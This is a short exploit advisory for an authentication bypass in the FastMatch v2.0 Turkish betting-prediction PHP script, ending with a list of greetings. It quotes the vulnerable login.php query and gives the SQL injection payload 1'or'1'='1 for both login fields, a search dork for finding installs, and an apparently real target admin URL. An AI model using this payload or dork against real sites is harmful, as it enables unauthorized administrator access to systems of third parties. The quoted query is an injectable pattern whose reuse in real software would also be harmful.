======================================================================================
| # Title : FastMatch v2.0 İddaa Tahmin Scripti auth by pass vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : v2.0
| # Vendor : http://wmscripti.com/php-scriptler/fastmatch-iddaa-tahmin-scripti.html
| # Dork : "FastMatch | İddaa Tahminleri Beta"
======================================================================================
poc :
login.php
line 9 : $bul = mysql_query("select * from admin where kadi='$user' && sifre='$pass'");
http://v2.zkulubu.com/admin/
user : 1'or'1'='1
pass : 1'or'1'='1
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | |
|
=======================================================================================================================================